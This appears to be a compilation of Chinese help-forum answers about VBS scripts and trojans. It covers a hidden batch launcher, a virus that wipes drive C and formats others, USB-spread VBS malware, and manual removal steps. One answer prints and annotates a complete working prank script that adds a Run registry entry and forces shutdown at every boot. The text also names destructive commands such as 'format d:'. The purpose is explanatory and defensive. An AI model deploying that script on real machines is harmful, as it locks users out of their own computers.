帮我看下这段vbs代码是干什么用的 360认为它是木马 请告诉我这代码的意思
set objShell=wscript.createObject("wscript.shell")
注释 隐藏cmd命令行运行框
iReturn=objShell.Run("cmd.exe /C C:\WINDOWS\sys.bat", 0, TRUE)
注释 开机后从C:\WINDOWS\sys.bat运行sys.bat脚本
从你给代码看,该win.vbs 的功能是 开机后以隐藏cmd运行框形式运行sys.bat脚本
win.vbs脚本不具有恶意代码,但请注意从win.vbs 脚本启动的sys.bat文件的安全性。
如果360只报win.vbs 为木马,却无视sys.bat。那你的系统可能已被感染,请注意查杀病毒
“xplorer.exe”是什么木马?
在暑期登陆的一个破坏性木马病毒。病毒首先把自己复制为C:xplorer.exe,从而伪装成正常的浏览器程序,然后病毒放出一个名为“sin.vbs”的脚本病毒文件并运行这个脚本文件,然后病毒会修改autoexec.bat文件,在其文件中植入破坏性代码。在下一次重新启动计算机时,会自动删除C盘下所有文件,并将D、E、F、G等硬盘格式化。
解决方案:
首先用户应该在进入系统后就检查一下C盘根目录是否有Explorer.exe的文件,如果存在而用户又没有拷贝过此文件,则可判断此必定是病毒,直接删除便可。
接着用记事本之类的文本编辑软件打开C:utoexec.bat文件(注意:千万不可双击,否则硬盘资料将全部被毁),看是否有“delete c: /y、format d:”之类的破坏语句,如果有则将之删除即可。如果用户对计算机系统不太熟悉,无法分辩出破坏语句的话,可以将autoexec.bat文件直接删除即可,此文件不影响windows系统的正常使用。
为避免用户遭受损失,瑞星公司已经进行了软件升级,瑞星杀毒软件14.14及以上的版本可以自动截获并清除此病毒,望广大用户及时升级。目前瑞星用户只需及时升级手中的软件即可彻底查杀“原罪”病毒。
如遇到异常情况,可随时拨打瑞星反病毒急救 *** :010-86243236或登陆瑞星反病毒网www.rising.com.cn,瑞星反病毒专家将为您提供全方位的技术支持与服务!
U盘中病毒,病毒后缀是vbs,如何清除病毒?
VBS病毒编写简单,但通过U盘传播是很有效的,很多人遇到的vbs病毒一般是movemenoreg.vbs,installer.vbs,helper.vbs这种病毒,而且需要打开隐藏系统文件设置才能在U盘里看到,隐藏的时候是不知道已经感染病毒了,这种病毒一般感染电脑后会把你的电脑当做肉鸡挖矿使用,所以很多人都根本不能发现,所以我们需要定时用专用的工具来对U盘进行杀毒,从而判断电脑有没有感染一些恶意木马。
感染后的U盘表现:
该病毒会在感染的U盘的根目录下建立两个隐藏目录和一个快捷方式文件,其中两个隐藏目录的名称分别为“-”和“WindowsServices”。在名为“-”的目录下存放着用户原来U盘里面的所有文件,在名为“WindowsServices”的目录下存放着三个病毒文件,文件名为:movemenoreg.vbs,installer.vbs,helper.vbs。
感染路径:
U盘被感染后,插入新的电脑上,只要点击了U盘里的模仿你正常文件的快捷方式就触发感染到新电脑上,一般复制病毒到电脑%AppData%\WindowsServices目录下,然后添加开机启动,如果有新U盘插上就麻烦感染新的U盘。
一、手动清除 *** :
1、先显示隐藏系统文件,打开任意一个文件夹,点击工具-文件夹选项-然后选择查看,取消勾选
隐藏受保护的操作系统文件,隐藏文件和文件夹选择显示隐藏的文件。
2、找到三个文件所在的位置,U盘里的打开就能看到,直接删除,电脑系统里的在C:\Users\Administrator\AppData\Roaming\WindowsServices文件夹里,但不是每个电脑都是这个文件夹。【C:\Users\****(这里就用你们自己名称)****\AppData\Roaming\WindowsServices\】文件夹是用中文显示的,所以找不到的小伙伴,就直接复制路径,改成你们的用户名就行了。3、注意U盘要先拔出电脑,然后再删电脑里的这些病毒文件,WindowsServices里有三个文件movemenoreg.vbs,installer.vbs,helper.vbs,删掉。
二、软件清除
U盘杀毒软件里清除vbs病毒的u *** killer工具,直接扫描电脑和U盘里所有的vbs病毒,清除所有VBS病毒,比手动操作方便,手动适合无 *** 的时候使用。
可以看到扫描对方选择,内存,本地硬盘和移动存储就是U盘后,点击开始扫描等待扫描完成就发现vbs病毒全部列出且已经清除病毒的结果。
电脑中了vbs病毒怎么解决
VBS病毒是用VB Script编写而成,该脚本语言功能非常强大,它们利用Windows系统的开放性特点,通过调用一些现成的Windows对象、组件,可以直接对文件系统、注册表等进行控制,功能非常强大。应该说病毒就是一种思想,但是这种思想在用VBS实现时变得极其容易。VBS脚本病毒具有如下几个特点:
编写简单、破坏力大、感染力强、传播范围广、变种多、欺骗性强;可以通过通过Email附件传播;通过局域网共享传播;通过感染htm、asp、jsp、php等网页文件传播;通过IRC聊天通道传播;
VBS脚本病毒一般是直接通过自我复制来感染文件的,病毒中的绝大部分代码都可以直接附加在其他同类程序的中间,中毒后的电脑会在各个盘符下面生成.vbs、autorun.exe等文件。下面笔者将一次手动成功清除VBS病毒的过程说一下,权当交流!
通过系统的资源管理器,可以看到一直有一个wscript.exe的进程存在,还有就是会感觉到机子很卡……
之一步:限制wscript.exe进程的运行。“开始——运行”,输入gpedit.msc,然后依次打开“计算机配置——Windows设置——安全设置——软件限制策略”,右键,选择“创建新策略”,选择“其他规则”,在右侧窗格空白处右击,在菜单中选择“新建路径规则”项,浏览选择C:\Windows\System32文件夹下的wscript.exe,将其安全级别设为“不允许”。这样我们就成功的限制了wscript.exe的运行。
第二步:通过任务管理器或者其他的工具,结束进程wscript.exe。
第三步:借助工具冰刃,删除各个盘符下面的.VBS、.vbe、js、autorun等文件。
第四步:搜索一下,在系统目录中是否还有.VBS、.vbe、js等文件存在,如果有,删除掉。在看看系统的启动项中有没有不明的启动项,如果有,也要删除掉!
第五步:重新启动电脑,看到各个盘符下面就没有.VBS等类型的文件了,系统也恢复到正常。
到这里,就已经成功的清除了VBS病毒!总结一下,重点是要限制VBS病毒的运行,只有先限制了它的运行,我们后面的删除工作才能正常的进.
电脑中了一种vbs后缀病毒,杀也杀不了,360总是报有病毒,但是查不出根来
这应该是自解压加入的vbs启动是为了开机启动木马 就是自解压可能是加密的 然后用vbs解密打开木马 这样你的杀毒软件就会每次开机都会杀到病毒(那也是病毒不免杀(就是免疫杀毒软件)) 在这种情况下 采取手工杀毒的办法比较好, 之一你要找到vbs 这个vbs应该导入启动项了 你可以在一些安全软件中 打开启动项就可以找到了 而你看到vbs在C:\WINDOWS\ 点开查找一下(要把隐藏项打开) 找不到起启动项里看看 一般安全软件可以定位文件的 这样就可以找到了 找到后 右键编辑 里面会有木马文件的地址 就可以找到木马 删了 一般木马都会在C:\下的 这样就可以解决了........祝你早日摆脱病毒的困扰
电脑中.vbs病毒,请大神翻译此代码:
哈哈,无聊简单的恶作剧VBS脚本,给你翻译一下吧,加了一些注释,你一看就会明白。
Dim HFWsr : Dim HFWfk : Dim HFWfw : Dim FwriteText : Dim HFWfp
HFWfp="C:\HFWkill.vbs" '这里是先定义一个恶作剧脚本的文件名,赋值给一变量方便后面调用
set HFWsr=CreateObject("wscript.shell") '创建Wscript对象
set HFWfk=CreateObject("Scripting.FileSystemObject") '这个对象用于下面的文件操作
Set HFWfw = HFWfk.CreateTextFile(HFWfp, true, false) '这里开始就是准备创建新的恶作剧脚本HFWkill.vbs了
HFWsr.Regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KILLHFW","C:\HFWKILL.VBS","REG_SZ" '这里是设置了开机自动运行 C盘根目录下由本程序创建的VBS程序
FwriteText = "dim HFWkill:set HFWkill=CreateObject(""Wscript.shell""):HFWkill.run ""shutdown -s -t 0 -f"",0" '它最主要是这段关机代码写入了这个新建的VBS文件
HFWfw.write FwriteText:HFWfw.close '创建完毕
HFWsr.run "attrib +h +r +s c:\hfwkill.vbs",0 '设置为此恶作剧文件为隐藏文件只读文件系统文件
msgbox "o(∩_∩)...! I LOVE YOU ! 你挂了...哈哈哈",0,"H*F*W" '这里是得意地向你表示它已得逞
HFWsr.run "shutdown -s -t 0 -f", 0 '这里是先关你一次机,接下来你一开机它就关机了,就是这么个简单小恶作剧脚本!
万一已“中毒”,则进入安全模式,在运行里输入“RegEdit” 打开注册表,然后把HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\下面的“KILLHFW”这项删除即可。顺便把C盘根目录下的HFWKILL.VBS文件也删除掉更好,当然要删除这个文件要先设置显示隐藏文件系统文件。若熟悉DOS,那么在CMD窗口里输入Del c:\HFWKILL.VBS 也行
pif、vbe、vbs的文件后缀都代表什么意思?木马文件一般以什么后缀?
Pif的中文名称叫:程序信息文件大概是“program information file”的缩写。指向DOS程序的快捷方式就是PIF文件,自从windows3.1就有了,内中包含执行DOS程序的一些设置,比如路径、窗口和字体。
VBE跟VBS差不多,都是VB脚本代码文件,但他们也有不同:VBS是明文代码,就是说可以直接使用记事本编辑;VBE则是编译后(加密)的VBS代码,使用记事本打开不能直接看到源代码。(有些例外)加密工具有很多,其中常用的是 Microsoft Script Encoder(screnc.exe),此外还有许多。VBE格式在 *** 传文件中往往不会被拦截,而VBS格式却会被拦截,这应该是程序设计者的一个失误。因此,所以很多人没有进行加密而直接改扩展名为“VBE”,依然能够运行,只是为了方便一下。
木马文件的后缀名很多,很难根据后缀名来判断是否是木马,只能根据特征码来判定,一些木马可以通过捆绑GIF,JPG图片来启动,有的则进驻DLL中,很难防范,更好的也是最普遍的方式就是装杀毒软件了